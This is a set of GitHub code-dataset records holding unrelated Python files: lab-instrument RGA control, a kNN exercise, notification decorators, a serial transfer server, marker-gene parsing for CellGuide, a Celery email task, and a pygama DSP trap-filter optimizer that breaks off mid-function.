Task.update.\n It will run when self.notify_data_available() is called.\n \"\"\"\n try:\n if not data_dict['t']:\n self.line2, = self.ax2.plot([], [])\n else:\n self.line1.set_xdata(data_dict['x'])\n self.line1.set_ydata(data_dict['y'])\n\n self.line2.set_xdata(data_dict['t'])\n self.line2.set_ydata(data_dict['i'])\n self.request_figure_update()\n\n except Exception as e:\n self.logger.error('update error: {}'.format(e))\n\n def cleanup(self):\n self.rga.scan.speed = self.old_speed\n self.rga.cem.voltage = self.old_hv\n self.rga.query_int('HV0')\n self.logger.info('Cleaned up')\n\n def measure_gain_at_voltage(self, voltage):\n self.rga.cem.voltage = 0\n time.sleep(2.0)\n fc_intensity = self.measure_intensity_with_delay(self.params[self.WaitTime])\n self.rga.cem.voltage = voltage\n time.sleep(2.0)\n cem_intensity = self.measure_intensity_with_delay(self.params[self.WaitTime])\n return cem_intensity / fc_intensity\n\n def measure_intensity_with_delay(self, delay):\n start_time = time.time()\n elapsed_time = 0\n d = 0.0 if delay < 0.0 else delay\n while elapsed_time <= d:\n elapsed_time = time.time() - start_time\n intensity = self.rga.scan.get_single_mass_scan(self.mass_to_measure_value) / 10.0\n return intensity\n\n\nif __name__ == '__main__':\n import logging\n import matplotlib.pyplot as plt\n\n from srsinst.rga import RGA100 as Rga\n from srsgui.task.callbacks import Callbacks\n\n logging.basicConfig(level=logging.DEBUG)\n\n task = CEMGainTask()\n task.set_callback_handler(Callbacks())\n\n rga = Rga('serial', 'COM3', 115200, True)\n # rga = Rga('tcpip','172.25.70.141','admin','admin')\n rga.comm.set_callbacks(logging.info, logging.info)\n task.inst_dict = {'dut': rga}\n\n task.figure = plt.figure()\n task.figure_dict = {'plot': task.figure}\n\n task.set_input_parameter(task.GainToSet, 500)\n \n task.start()\n task.wait()\n task.update(task.data_dict)\n plt.show()\n\n","repo_name":"thinkSRS/srsinst.rga","sub_path":"srsinst/rga/tasks/cemgaintask.py","file_name":"cemgaintask.py","file_ext":"py","file_size_in_byte":9011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5648086079","text":"\n#Importe as bibliotecas necessárias.\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\n\n# Carregue o dataset. Se houver o dataset atualizado, carregue o atualizado.\ndf = pd.read_csv(r'C:\\Users\\Sávio\\Downloads\\flavors_of_cacao_ajustado.csv')\n\n#Normalize com a melhor normalização o conjunto de dados se houver melhoria.\n\nX = df.drop(['Rating_Categories'], axis=1)\ny = df['Rating_Categories']\n\nscaler = StandardScaler()\nX_norm = scaler.fit_transform(X)\n\nX_train, X_test, y_train, y_test = train_test_split(X_norm, y, test_size=0.3, random_state=42)\n\nknn = KNeighborsClassifier()\n\nknn.fit(X_train, y_train)\naccuracia_var = knn.score(X_test, y_test)\n\n# Plote o gráfico com o a indicação do melhor k.\nneighbors = np.arange(1, 15)\ntrain_accuracies = {}\ntest_accuracies = {}\n\nfor neighbor in neighbors:\n knn =KNeighborsClassifier(n_neighbors=neighbor)\n knn.fit(X_train, y_train)\n\n train_accuracies[neighbor] = knn.score(X_train, y_train)\n test_accuracies[neighbor] = knn.score(X_test, y_test)\n\nprint(\"\\nTreino, acuracia: \",train_accuracies)\nprint(\"\\nteste, acuracia: \", test_accuracies)\nplt.title(\"Qual o melhor k possível:\")\nplt.plot(neighbors, train_accuracies.values(), label=\"Acurácia de treino\")\nplt.plot(neighbors, test_accuracies.values(), label=\"Acurácia de teste\")\nplt.legend()\nplt.show()\n\n","repo_name":"DSsavioluis/IA","sub_path":"AV1/questão4.py","file_name":"questão4.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"15555353508","text":"import time\nimport socket\nimport functools\nimport re\nimport yagmail\nimport sys\nimport subprocess\nimport platform\n\nfrom loguru import logger\nfrom datetime import datetime\n\n\nDATE_FORMAT = \"%Y-%m-%d %H:%M:%S\"\nREGEX = \"[^@]+@[^@]+\\.[^@]+\"\n\ndef notify_email(recipient_emails: list, sender_email: str):\n\n if sender_email is None or not isinstance(sender_email, str):\n raise Exception('You must provide a single sender email as a string')\n\n if not re.fullmatch(REGEX, sender_email):\n raise Exception(f'{sender_email} is not a valid email format.')\n\n if(not isinstance(recipient_emails, list)):\n recipient_emails = [recipient_emails]\n\n for _, email in enumerate(recipient_emails):\n if not re.fullmatch(REGEX, email):\n raise Exception(f'{email} is not a valid email format.')\n\n yag = yagmail.SMTP(sender_email)\n\n def decorator_func(func):\n @functools.wraps(func)\n def wrapper_func(*args, **kwargs):\n\n machine = socket.gethostname()\n func_name = func.__name__\n start_time = datetime.now().strftime(DATE_FORMAT)\n\n try:\n value = func(*args, **kwargs)\n end_time = datetime.now().strftime(DATE_FORMAT)\n\n contents = [\n f'You are receiving this email as the {func_name} process running on {machine} machine is completed 🚀.',\n f'This process started at {start_time} and finished successfully at {end_time}.'\n ]\n\n yag.send(\n to = recipient_emails,\n subject = 'Process finished successfully 🚀.',\n contents = '\\n'.join(contents))\n \n return value\n\n except Exception as e: \n logger.error('Error occurred during the process: '+ str(e))\n \n end_time = datetime.now().strftime(DATE_FORMAT)\n\n contents = [\n f'The error occured at {datetime.now().strftime(DATE_FORMAT)} with an exception \"{str(e)}\"',\n f'Your process running on {machine} machine started at {start_time} and failed at {end_time}.'\n ]\n\n yag.send(\n to = recipient_emails,\n subject = 'An error occurred while running your script.',\n contents = '\\n'.join(contents))\n\n raise e\n \n return wrapper_func\n return decorator_func\n\n\ndef notify_desktop(title: str = \"Desktop Notification\"):\n\n def display_notification(text: str, title: str):\n if platform.system() == \"Windows\":\n\n try:\n from win10toast import ToastNotifier\n except Exception as e:\n logger.error(\"Error importing ToastNotifier, please run pip install win10toast\")\n\n toast = ToastNotifier()\n\n toast.show_toast(\n title=title,\n msg=text,\n icon_path=None,\n duration=7)\n\n pass\n\n elif platform.system() == \"Linux\":\n subprocess.run([\"notify-send\", title, text])\n\n elif platform.system() == \"Darwin\":\n subprocess.run([\"sh\", \"-c\", \"osascript -e 'display notification \\\"%s\\\" with title \\\"%s\\\"'\" % (text, title)])\n\n\n def decorator_func(func):\n @functools.wraps(func)\n def wrapper_func(*args, **kwargs):\n\n machine = socket.gethostname()\n func_name = func.__name__\n start_time = datetime.now().strftime(DATE_FORMAT)\n\n try:\n value = func(*args, **kwargs)\n end_time = datetime.now().strftime(DATE_FORMAT)\n\n contents = [\n f'You are receiving this notification as the {func_name} process running on {machine} machine is completed 🚀.',\n f'This process started at {start_time} and finished successfully at {end_time}.'\n ]\n\n display_notification(text='\\n'.join(contents), title=title)\n\n return value\n except Exception as e: \n logger.error('Error occurred during the process: '+ str(e))\n \n end_time = datetime.now().strftime(DATE_FORMAT)\n\n contents = [\n f'An error occurred while running your script.',\n f'The error occurred at {datetime.now().strftime(DATE_FORMAT)} with an exception \"{str(e)}\"',\n f'Your process running on {machine} machine started at {start_time} and failed at {end_time}.'\n ]\n\n display_notification(text='\\n'.join(contents), title=title)\n\n raise e\n \n return wrapper_func\n return decorator_func","repo_name":"abdalrhmanu/ml-experiments","sub_path":"ml_experiments/notify.py","file_name":"notify.py","file_ext":"py","file_size_in_byte":4813,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"32658809171","text":"from email import header\nfrom enlace import *\nimport time\nfrom tqdm import tqdm\n\nclass Server:\n\n def __init__(self, porta= 'COM3',baudRate= 115200):\n self.idServer = 12\n self.idClient = 0\n self.porta = porta\n self.baudRate = baudRate\n self.eopEncoded = b'\\x02\\x05\\x00\\x07'\n self.rxBuffer = self.rxBufferLen = 0\n self.idArquivo = 0\n self.n_pacotes = 0\n self.pacotes = []\n\n def bufferDecodificado(self, buffer):\n '''\n h0 – tipo de mensagem\n h1 – id do cliente\n h2 – id do servidor\n h3 – número total de pacotes do arquivo\n h4 – número do pacote sendo enviado\n h5 – se tipo for handshake:id do arquivo||se tipo for dados: tamanho do payload\n h6 – pacote solicitado para recomeço quando a erro no envio.\n h7 – último pacote recebido com sucesso.\n h8 – h9 – CRC\n '''\n h0 = buffer[0]\n h1 = buffer[1]\n h2 = buffer[2]\n h3 = buffer[3]\n h4 = buffer[4]\n h5 = buffer[5]\n h6 = buffer[6]\n h7 = buffer[7]\n h8 = buffer[8]\n h9 = buffer[9]\n\n if h0 == 1:\n self.n_pacotes = h3\n self.idArquivo = h5\n self.idClient = h1\n self.pacoteAnalisado = h4\n self.pacoteAtual = h4\n self.tamanhoPacoteAtual = h5\n elif h0 == 2:\n self.pacoteAtual = h4\n self.tamanhoPacoteAtual = h5\n \n return [h0,h1,h2,h3,h4,h5,h6,h7,h8,h9]\n\n def mudaHeader(self,header,posicao, valor):\n novo_valor = (valor).to_bytes(1, byteorder='big')\n novoHeader = header[:posicao]+novo_valor+header[posicao+1:]\n return novoHeader\n\n\n def handshakePrometido(self):\n\n print('Esperando Head Protocol...')\n rxBufferHeader, nRxHeaderLen = self.serverCom.getData(14)\n print('Tamanho do Head: {} bytes.'.format(nRxHeaderLen))\n header = self.bufferDecodificado(rxBufferHeader)\n \n if header[0]==1 and header[2]==self.idServer:\n print('Head Protocol recebido! Client ID: {}.'\n .format(self.idClient))\n newHeader = self.mudaHeader(rxBufferHeader,0,2)\n print('Enviando Handshake...\\n')\n self.serverCom.sendData(newHeader)\n\n\n def integridadeArquivoBuffer(self,pacote):\n header = self.bufferDecodificado(pacote)\n if pacote[-4:]==self.eopEncoded and header[4]== self.pacoteAnalisado+1:\n # print('sequencial',header[4])\n self.pacoteAnalisado=header[4]\n return True\n else:\n return False\n\n \n\n\n def receberArquivoBuffer(self):\n pbar = tqdm(total=self.n_pacotes,unit='bytes',unit_scale=128,\n desc='Bytes Recebidos')\n while len(self.pacotes) str:\n \"\"\"\n Extracts the tissue ID from the given anatomical structures. By convention,\n the anatomical structures from ASCTB are sorted in order of increasing granularity.\n This function prioritizes tissue IDs that are present in WMG. It takes the most\n granular term that is present in WMG. Otherwise, it defaults to the least\n granular term.\n\n\n Arguments\n ---------\n anatomical_structures - list[AnatomicalStructure]\n a list of anatomical structures for a particular ASCTB table entry.\n\n Returns\n -------\n tissue_id - str\n The tissue ID extracted from the input anatomical structures.\n \"\"\"\n\n tissue_id = anatomical_structures[0].id\n for entry in anatomical_structures:\n if entry.id in self.wmg_tissues:\n tissue_id = entry.id\n return tissue_id\n\n def _get_gene_info(self, gene_biomarkers: list[GeneBiomarker]) -> Tuple[list[str], list[str]]:\n \"\"\"\n Extracts the gene information from the given gene biomarkers.\n This function only adds gene IDs that are present in WMG.\n\n Arguments\n ---------\n gene_biomarkers - list[GeneBiomarker]\n a list of gene biomarkers for a particular ASCTB table entry.\n\n Returns\n -------\n gene_symbols - list[str]\n The list of gene symbols extracted from the input gene biomarkers.\n gene_names - list[str]\n The list of gene names extracted from the input gene biomarkers.\n \"\"\"\n\n gene_symbols = []\n gene_names = []\n for gene in gene_biomarkers:\n symbol = gene.name.upper()\n if symbol and symbol in self.wmg_human_genes:\n name = gene.rdfs_label or self.gene_id_to_name.get(symbol, symbol)\n gene_symbols.append(symbol)\n gene_names.append(name)\n return gene_symbols, gene_names\n\n def _get_references(self, references: list[Reference], doi_to_citation: dict[str, str]) -> Tuple[str, str]:\n \"\"\"\n Extracts the DOIs and citations from the given list of references.\n This function cleans the DOI and gets the title and formatted citation from the DOI.\n\n Arguments\n ---------\n references - list[Reference]\n a list of references for a particular ASCTB table entry.\n doi_to_citation - dict[str,str]\n a dictionary mapping DOIs to citations.\n\n Returns\n -------\n refs - str\n The ';;'-concatenated DOIs extracted from the input references.\n titles - list[str]\n The ';;'-concatenated titles extracted from the input references.\n \"\"\"\n\n def fetch_doi_info(ref):\n doi = clean_doi(ref.doi)\n if doi:\n if doi not in doi_to_citation:\n title = get_title_and_citation_from_doi(doi)\n doi_to_citation[doi] = title\n else:\n title = doi_to_citation[doi]\n return doi, title\n\n with ThreadPoolExecutor() as executor:\n results = list(executor.map(fetch_doi_info, references))\n\n filtered_results = [result for result in results if result is not None]\n if not filtered_results:\n return \"\", \"\"\n\n refs, titles = zip(*filtered_results)\n return \";;\".join(refs), \";;\".join(titles)\n\n def get_processed_asctb_table_entries(self) -> dict[str, ParsedAsctbTableEntry]:\n \"\"\"\n Processes the ASCTB table entries and returns a dictionary mapping cell type ontology term IDs to\n ParsedAsctbTableEntry objects. The processing involves extracting relevant information from the ASCTB data\n such as tissue ID, gene symbols and names, DOIs and citations, and cell type ontology term IDs. It also\n involves cleaning and formatting the extracted data.\n\n Returns\n -------\n dict[str, ParsedAsctbTableEntry]\n A dictionary mapping cell type ontology term IDs to ParsedAsctbTableEntry objects.\n \"\"\"\n\n # DOI to citation mapping\n results = [delayed(self._process_asct_table__parallel)(tissue) for tissue in self.asctb_data]\n logger.info(f\"Getting processed ASCTB table entries for {len(self.asctb_data)} tissues...\")\n with ProgressBar():\n parsed_table_entries = sum(compute(*results, num_workers=CELLGUIDE_PIPELINE_NUM_CPUS), [])\n\n # Drop duplicate entries if they exist\n parsed_table_entries = pd.DataFrame(parsed_table_entries).drop_duplicates().to_dict(\"records\")\n\n logger.info(\"Fetching tissue names from UBERON ontology...\")\n tissues_in_parsed_table_entries = [i[\"tissue\"] for i in parsed_table_entries]\n tissues_by_id = {t: ontology_term_label(t) for t in tissues_in_parsed_table_entries}\n\n gene_infos = {}\n for entry in parsed_table_entries:\n entry_copy = entry.copy()\n ct = entry_copy[\"cell_type_ontology_term_id\"]\n del entry_copy[\"cell_type_ontology_term_id\"]\n\n celltype_markers_list = gene_infos.get(ct, [])\n entry_copy[\"tissue\"] = tissues_by_id.get(entry_copy[\"tissue\"], entry_copy[\"tissue\"])\n celltype_markers_list.append(entry_copy)\n gene_infos[ct] = celltype_markers_list\n\n logger.info(\"Aggregating gene biomarkers across tissues and publications across biomarkers and cell types...\")\n\n def aggregate_publications(publication):\n # Remove empty publications and get unique ones with order preserved\n publications = [i for i in publication.values if i != \"\"]\n unique_publications = list(dict.fromkeys(publications))\n return \";;\".join(unique_publications)\n\n def aggregate_gene_names(names, symbols):\n # If possible, pick a gene name that is not a gene symbol\n non_symbol_names = [name for name in names.values if name not in symbols]\n return next(iter(non_symbol_names), names.values[0])\n\n for cell_type in gene_infos:\n # Convert the list of gene info for the current cell type to a DataFrame\n gene_info_df = pd.DataFrame(gene_infos[cell_type])\n gene_symbols = gene_info_df[\"symbol\"].values\n\n # Group the DataFrame by tissue and symbol, and aggregate the names and publications\n aggregated_gene_info = (\n gene_info_df.groupby([\"tissue\", \"symbol\"])\n .agg(\n {\n \"name\": lambda names, symbols=gene_symbols: aggregate_gene_names(names, symbols),\n \"publication\": aggregate_publications,\n \"publication_titles\": aggregate_publications,\n }\n )\n .reset_index()\n .to_dict(orient=\"records\")\n )\n\n # Create a DataFrame from the aggregated gene info\n aggregated_gene_info_df = pd.DataFrame(aggregated_gene_info)\n\n # Aggregate the gene info across all tissues\n all_tissues_gene_info = (\n aggregated_gene_info_df.groupby(\"symbol\")\n .agg(\n {\n \"name\": lambda names, symbols=gene_symbols: aggregate_gene_names(names, symbols),\n \"publication\": aggregate_publications,\n \"publication_titles\": aggregate_publications,\n }\n )\n .reset_index()\n )\n\n # Add a column indicating these records are for all tissues\n all_tissues_gene_info[\"tissue\"] = \"All Tissues\"\n\n # Ensure the DataFrame has the same column order as the original\n all_tissues_gene_info = all_tissues_gene_info[aggregated_gene_info_df.columns]\n\n # Add the all-tissues gene info to the list of aggregated gene info\n aggregated_gene_info.extend(all_tissues_gene_info.to_dict(orient=\"records\"))\n\n # Update the gene info for the current cell type\n gene_infos[cell_type] = [ParsedAsctbTableEntry(**entry) for entry in aggregated_gene_info]\n\n return gene_infos\n\n def _process_asct_table__parallel(self, tissue: str) -> list[dict[str, str]]:\n \"\"\"\n Processes the ASCTB table entries for a given tissue in parallel and returns a list of dictionaries.\n Each dictionary is an entry containing a tissue, gene symbol, gene name, publication,\n publication title, and cell type ontology term ID. The processing involves extracting\n relevant information from the ASCTB data such as tissue ID, gene symbols and names, DOIs and citations,\n and cell type ontology term IDs. It also involves cleaning and formatting the extracted data.\n\n Arguments\n ---------\n tissue - str\n The tissue for which the ASCTB table entries are to be processed.\n\n Returns\n -------\n list[dict[str, str]]\n A list of dictionaries, each containing information about a unique combination of tissue, gene symbol,\n gene name, publication, publication title, and cell type ontology term ID.\n \"\"\"\n\n doi_to_citation = {}\n\n data = self.asctb_data[tissue][\"data\"]\n\n parsed_table_entries = []\n for row in data:\n cell_types = [celltype[\"id\"] for celltype in row[\"cell_types\"] if celltype[\"id\"].startswith(\"CL:\")]\n if not cell_types or not row[\"biomarkers_gene\"]:\n continue\n\n tissue_id = self._get_tissue_id([AnatomicalStructure(**entry) for entry in row[\"anatomical_structures\"]])\n gene_symbols, gene_names = self._get_gene_info([GeneBiomarker(**entry) for entry in row[\"biomarkers_gene\"]])\n refs, titles = self._get_references([Reference(**entry) for entry in row[\"references\"]], doi_to_citation)\n\n for cell_type in cell_types:\n for index in range(len(gene_symbols)):\n symbol = gene_symbols[index]\n name = gene_names[index]\n\n entry = {\n \"tissue\": tissue_id,\n \"symbol\": symbol,\n \"name\": name,\n \"publication\": refs,\n \"publication_titles\": titles,\n \"cell_type_ontology_term_id\": cell_type,\n }\n parsed_table_entries.append(entry)\n return parsed_table_entries\n","repo_name":"chanzuckerberg/single-cell-data-portal","sub_path":"backend/cellguide/pipeline/canonical_marker_genes/canonical_markers.py","file_name":"canonical_markers.py","file_ext":"py","file_size_in_byte":12616,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"35"} +{"seq_id":"30132708184","text":"from __future__ import absolute_import, unicode_literals\n\nfrom celery import shared_task\nfrom django.conf import settings\nfrom django.core.mail import send_mail\n\n\n@shared_task\ndef send_email(email=None):\n if email:\n send_mail(\n 'Thanks for your order!',\n 'We will contact you as soon as possible.',\n settings.DEFAULT_FROM_EMAIL,\n [email],\n fail_silently=False,\n )\n","repo_name":"Dmitry-Kiselev/store","sub_path":"order/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"24372600540","text":"#!/usr/bin/env python3\nimport os\nimport re\nimport time\nimport json\nimport argparse\nimport pandas as pd\nimport numpy as np\nfrom pprint import pprint\nfrom datetime import datetime\nimport itertools\nfrom collections import OrderedDict\nfrom scipy.optimize import curve_fit\n\nimport tinydb as db\nfrom tinydb.storages import MemoryStorage\n\nimport matplotlib\nif os.environ.get('HOSTNAME'): # cenpa-rocks\n matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nplt.style.use('../clint.mpl')\nfrom matplotlib.colors import LogNorm\n\nimport warnings\nwith warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n from tqdm import tqdm\n tqdm.pandas() # suppress annoying FutureWarning\n\nfrom pygama import DataGroup\nfrom pygama.dsp.units import *\nfrom pygama.io.raw_to_dsp import build_processing_chain\nfrom pygama.dsp.ProcessingChain import ProcessingChain\nimport pygama.io.lh5 as lh5\nimport pygama.analysis.histograms as pgh\nimport pygama.analysis.peak_fitting as pgf\n\n\ndef main():\n doc=\"\"\"\n === optimizer.py ====================================================\n\n dsp optimization app, works with DataGroup\n\n === C. Wiseman (UW) =============================================\n \"\"\"\n rthf = argparse.RawTextHelpFormatter\n par = argparse.ArgumentParser(description=doc, formatter_class=rthf)\n arg, st, sf = par.add_argument, 'store_true', 'store_false'\n \n # primary operations\n arg('-q', '--query', nargs=1, type=str,\n help=\"select group to analyze: -q 'cycle==1' \")\n arg('-e', '--energy', action=st, help='optimize energy trapezoid')\n arg('-d', '--dcr', action=st, help='optimize DCR parameter')\n\n args = par.parse_args()\n \n # -- setup -- \n \n # load main DataGroup, select files to analyze\n dg = DataGroup('cage.json', load=True)\n if args.query:\n que = args.query[0]\n dg.fileDB.query(que, inplace=True)\n else:\n dg.fileDB = dg.fileDB[-1:]\n \n view_cols = ['run','cycle','daq_file','runtype','startTime','threshold']\n print(dg.fileDB[view_cols].to_string())\n # print(f'Found {len(dg.fileDB)} files.')\n \n # -- run routines -- \n \n # TODO : we could split this code into \"spectrum\" (peak width) optimizations, \n # and \"waveform\" optimizations, where the FOM is a waveform, not a peak.\n # so like optimize_spec.py and optimize_wfs.py\n \n optimize_trap(dg)\n show_trap_results()\n \n # optimize_dcr(dg) \n # show_dcr_results(dg)\n # check_wfs(dg)\n \n \ndef optimize_trap(dg):\n \"\"\"\n Generate a file with grid points to search, and events from the target peak. \n Then run DSP a bunch of times on the small table, and fit the peak w/ the\n peakshape function. \n NOTE: run table-to-table DSP (no file I/O)\n \"\"\"\n f_peak = './temp_peak.lh5' # lh5\n f_results = './temp_results.h5' # pandas\n grp_data, grp_grid = '/optimize_data', '/optimize_grid'\n \n # epar, elo, ehi, epb = 'energy', 0, 1e7, 10000 # full range\n epar, elo, ehi, epb = 'energy', 3.88e6, 3.92e6, 500 # K40 peak\n \n show_movie = True\n write_output = True\n n_rows = None # default None\n \n with open('opt_trap.json') as f:\n dsp_config = json.load(f, object_pairs_hook=OrderedDict)\n \n # files to consider. fixme: right now only works with one file\n sto = lh5.Store()\n lh5_dir = os.path.expandvars(dg.config['lh5_dir'])\n raw_list = lh5_dir + dg.fileDB['raw_path'] + '/' + dg.fileDB['raw_file']\n f_raw = raw_list.values[0] \n tb_raw = 'ORSIS3302DecoderForEnergy/raw/'\n\n # quick check of the energy range\n # ene_raw = sto.read_object(tb_raw+'/'+epar, f_raw).nda\n # hist, bins, var = pgh.get_hist(ene_raw, range=(elo, ehi), dx=epb)\n # plt.plot(bins[1:], hist, ds='steps')\n # plt.show()\n # exit()\n \n # set grid parameters\n # TODO: jason's suggestions, knowing the expected shape of the noise curve\n # e_rises = np.linspace(-1, 0, sqrt(sqrt(3))\n # e_rises # make another list which is 10^pwr of this list\n # np.linspace(log_tau_min, log_tau_max) # try this too\n e_rises = np.arange(1, 12, 1)\n e_flats = np.arange(1, 6, 1)\n # rc_consts = np.arange(54, 154, 10) # changing this here messes up DCR\n \n # -- create the grid search file the first time -- \n # NOTE: this makes a linear grid, and is editable by the arrays above.\n # jason also proposed a more active gradient-descent style search\n # like with Brent's method. (https://en.wikipedia.org/wiki/Brent%27s_method)\n \n if True:\n # if not os.path.exists(f_peak):\n print('Recreating grid search file')\n \n # create the grid file\n # NOTE: save it as an lh5 Table just as an example of writing/reading one\n lists = [e_rises, e_flats]#, rc_consts]\n prod = list(itertools.product(*lists)) # clint <3 stackoverflow\n df_grid = pd.DataFrame(prod, columns=['rise', 'flat'])#,'rc']) \n lh5_grid = {}\n for i, dfcol in df_grid.iteritems():\n lh5_grid[dfcol.name] = lh5.Array(dfcol.values)\n tb_grid = lh5.Table(col_dict=lh5_grid)\n sto.write_object(tb_grid, grp_grid, f_peak)\n \n # filter events by onboard energy\n ene_raw = sto.read_object(tb_raw+'/'+epar, f_raw).nda\n # hist, bins, var = pgh.get_hist(ene_raw, range=(elo, ehi), dx=epb)\n # plt.plot(bins[1:], hist, ds='steps')\n # plt.show()\n if n_rows is not None:\n ene_raw = ene_raw[:n_rows]\n idx = np.where((ene_raw > elo) & (ene_raw < ehi))\n\n # create a filtered table with correct waveform and attrs\n # TODO: move this into a function in lh5.py which takes idx as an input\n tb_data, wf_tb_data = lh5.Table(), lh5.Table()\n\n # read non-wf cols (lh5 Arrays)\n data_raw = sto.read_object(tb_raw, f_raw, n_rows=n_rows)\n for col in data_raw.keys():\n if col=='waveform': continue\n newcol = lh5.Array(data_raw[col].nda[idx], attrs=data_raw[col].attrs)\n tb_data.add_field(col, newcol)\n \n # handle waveform column (lh5 Table)\n data_wfs = sto.read_object(tb_raw+'/waveform', f_raw, n_rows=n_rows)\n for col in data_wfs.keys():\n attrs = data_wfs[col].attrs\n if isinstance(data_wfs[col], lh5.ArrayOfEqualSizedArrays):\n # idk why i can't put the filtered array into the constructor\n aoesa = lh5.ArrayOfEqualSizedArrays(attrs=attrs, dims=[1,1])\n aoesa.nda = data_wfs[col].nda[idx]\n newcol = aoesa\n else:\n newcol = lh5.Array(data_wfs[col].nda[idx], attrs=attrs)\n wf_tb_data.add_field(col, newcol)\n tb_data.add_field('waveform', wf_tb_data)\n tb_data.attrs = data_raw.attrs\n sto.write_object(tb_data, grp_data, f_peak)\n\n else:\n print('Loading peak file. groups:', sto.ls(f_peak))\n tb_grid = sto.read_object(grp_grid, f_peak)\n tb_data = sto.read_object(grp_data, f_peak) # filtered file\n # tb_data = sto.read_object(tb_raw, f_raw) # orig file\n df_grid = tb_grid.get_dataframe()\n \n # check shape of input table\n print('input table attributes:')\n for key in tb_data.keys():\n obj = tb_data[key]\n if isinstance(obj, lh5.Table):\n for key2 in obj.keys():\n obj2 = obj[key2]\n print(' ', key, key2, obj2.nda.shape, obj2.attrs)\n else:\n print(' ', key, obj.nda.shape, obj.attrs)\n\n # clear new colums if they exist\n new_cols = ['e_fit', 'fwhm_fit', 'rchisq', 'xF_err', 'fwhm_ovr_mean']\n for col in new_cols:\n if col in df_grid.columns:\n df_grid.drop(col, axis=1, inplace=True)\n\n t_start = time.time()\n def run_dsp(dfrow):\n \"\"\"\n run dsp on the test file, editing the processor list\n alternate idea: generate a long list of processors with different names\n \"\"\"\n # adjust dsp config dictionary\n rise, flat = dfrow\n # dsp_config['processors']['wf_pz']['defaults']['db.pz.tau'] = f'{tau}*us'\n dsp_config['processors']['wf_trap']['args'][1] = f'{rise}*us'\n dsp_config['processors']['wf_trap']['args'][2] = f'{flat}*us'\n # pprint(dsp_config)\n \n # run dsp\n pc, tb_out = build_processing_chain(tb_data, dsp_config, verbosity=0)\n pc.execute()\n \n # analyze peak\n e_peak = 1460.\n etype = 'trapEmax'\n elo, ehi, epb = 4000, 4500, 3 # the peak moves around a bunch\n energy = tb_out[etype].nda\n \n # get histogram\n hE, bins, vE = pgh.get_hist(energy, range=(elo, ehi), dx=epb)\n xE = bins[1:]\n \n # should I center the max at 1460?\n\n # simple numerical width\n i_max = np.argmax(hE)\n h_max = hE[i_max]\n upr_half = xE[(xE > xE[i_max]) & (hE <= h_max/2)][0]\n bot_half = xE[(xE < xE[i_max]) & (hE >= h_max/2)][0]\n fwhm = upr_half - bot_half\n sig = fwhm / 2.355\n \n # fit to gaussian: amp, mu, sig, bkg\n fit_func = pgf.gauss_bkg\n amp = h_max * fwhm\n bg0 = np.mean(hE[:20])\n x0 = [amp, xE[i_max], sig, bg0]\n xF, xF_cov = pgf.fit_hist(fit_func, hE, bins, var=vE, guess=x0)\n\n # collect results\n e_fit = xF[0]\n xF_err = np.sqrt(np.diag(xF_cov))\n e_err = xF\n fwhm_fit = xF[1] * 2.355 * 1460. / e_fit\n \n fwhm_err = xF_err[2] * 2.355 * 1460. / e_fit\n \n chisq = []\n for i, h in enumerate(hE):\n model = fit_func(xE[i], *xF)\n diff = (model - h)**2 / model\n chisq.append(abs(diff))\n rchisq = sum(np.array(chisq) / len(hE))\n fwhm_ovr_mean = fwhm_fit / e_fit\n\n if show_movie:\n \n plt.plot(xE, hE, ds='steps', c='b', lw=2, label=f'{etype} {rise}--{flat}')\n\n # peak shape\n plt.plot(xE, fit_func(xE, *x0), '-', c='orange', alpha=0.5,\n label='init. guess')\n plt.plot(xE, fit_func(xE, *xF), '-r', alpha=0.8, label='peakshape fit')\n plt.plot(np.nan, np.nan, '-w', label=f'mu={e_fit:.1f}, fwhm={fwhm_fit:.2f}')\n\n plt.xlabel(etype, ha='right', x=1)\n plt.ylabel('Counts', ha='right', y=1)\n plt.legend(loc=2)\n\n # show a little movie\n plt.show(block=False)\n plt.pause(0.01)\n plt.cla()\n\n # return results\n return pd.Series({'e_fit':e_fit, 'fwhm_fit':fwhm_fit, 'rchisq':rchisq,\n 'fwhm_err':xF_err[0], 'fwhm_ovr_mean': fwhm_ovr_mean})\n \n # df_grid=df_grid[:10]\n df_tmp = df_grid.progress_apply(run_dsp, axis=1)\n df_grid[new_cols] = df_tmp\n # print(df_grid)\n \n if show_movie:\n plt.close()\n \n print('elapsed:', time.time() - t_start)\n if write_output:\n df_grid.to_hdf(f_results, key=grp_grid)\n print(f\"Wrote output file: {f_results}\")\n\n\ndef show_trap_results():\n \"\"\"\n plot of ramp/flat time vs target peak FWHM\n \"\"\"\n df_grid = pd.read_hdf('./temp_results.h5', '/optimize_grid')\n print(df_grid)\n \n print('Minimum fwhm:')\n print(df_grid[df_grid.fwhm_ovr_mean==df_grid.fwhm_ovr_mean.min()])\n \n plt.plot(df_grid.e_fit, df_grid.fwhm_ovr_mean, '.b')\n plt.show()\n \n \ndef optimize_dcr(dg):\n \"\"\"\n I don't have an a priori figure of merit for the DCR parameter, until I can\n verify that we're seeing alphas. So this function should just run processing\n on a CAGE run with known alpha events, and show you the 2d DCR vs. energy.\n \n Once we know we can reliably measure the alpha distribution somehow, then\n perhaps we can try a grid search optimization like the one done in \n optimize_trap.\n \"\"\"\n # files to consider. fixme: right now only works with one file\n sto = lh5.Store()\n lh5_dir = os.path.expandvars(dg.config['lh5_dir'])\n raw_list = lh5_dir + dg.fileDB['raw_path'] + '/' + dg.fileDB['raw_file']\n f_raw = raw_list.values[0] \n \n tb_raw = 'ORSIS3302DecoderForEnergy/raw/'\n tb_data = sto.read_object(tb_raw, f_raw)\n \n cycle = dg.fileDB['cycle'].values[0]\n f_results = f'./temp_{cycle}.h5'\n \n write_output = True\n \n # adjust dsp config \n with open('opt_dcr.json') as f:\n 